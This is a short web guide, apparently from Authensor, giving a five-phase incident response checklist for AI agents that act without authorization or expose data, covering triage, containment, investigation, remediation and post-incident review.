← Back to Learn
monitoringbest-practicescompliance

AI Agent Incident Response Checklist

Authensor

When an AI agent takes an unauthorized action, exposes sensitive data, or behaves in an unexpected way, the response must be fast and structured. Ad hoc responses lead to missed steps, incomplete containment, and recurrence. This checklist provides a structured response procedure.

Phase 1: Detection and Triage (0 to 15 minutes)

  • [ ] Confirm the incident is real (not a false positive from monitoring)
  • [ ] Classify severity: Critical (active harm), High (potential harm), Medium (policy violation, no harm), Low (anomalous but benign)
  • [ ] Notify the on-call safety engineer
  • [ ] Open an incident channel for coordination

Phase 2: Containment (15 to 60 minutes)

  • [ ] Activate the kill switch if the agent is actively causing harm
  • [ ] If not critical, switch the agent to shadow mode (evaluate but do not execute)
  • [ ] Revoke or rotate any credentials the agent may have exposed
  • [ ] Block the specific tool or action involved in the incident
  • [ ] Preserve all logs and audit trail receipts before any cleanup

Phase 3: Investigation (1 to 24 hours)

  • [ ] Pull the complete audit trail for the agent's session
  • [ ] Verify audit trail integrity (check hash chain)
  • [ ] Identify the root cause: Was this a policy gap, prompt injection, tool misconfiguration, or model behavior?
  • [ ] Determine the blast radius: What data was accessed? What actions were taken? Who was affected?
  • [ ] Document the full timeline of events

Phase 4: Remediation (24 to 72 hours)

  • [ ] Update the policy to prevent recurrence
  • [ ] Add detection rules for the specific attack pattern
  • [ ] Test the fix with the original attack input
  • [ ] Re-enable the agent in shadow mode and verify correct behavior
  • [ ] Gradually restore full operation

Phase 5: Post-Incident Review (within 1 week)

  • [ ] Conduct a blameless post-incident review with all involved parties
  • [ ] Document lessons learned and action items
  • [ ] Update the incident response runbook based on findings
  • [ ] Share anonymized findings with the broader team

Every incident is an opportunity to strengthen the safety system. Treat the post-incident review as the most important phase.

Keep learning

Explore more guides on AI agent safety, prompt injection, and building secure systems.

View All Guides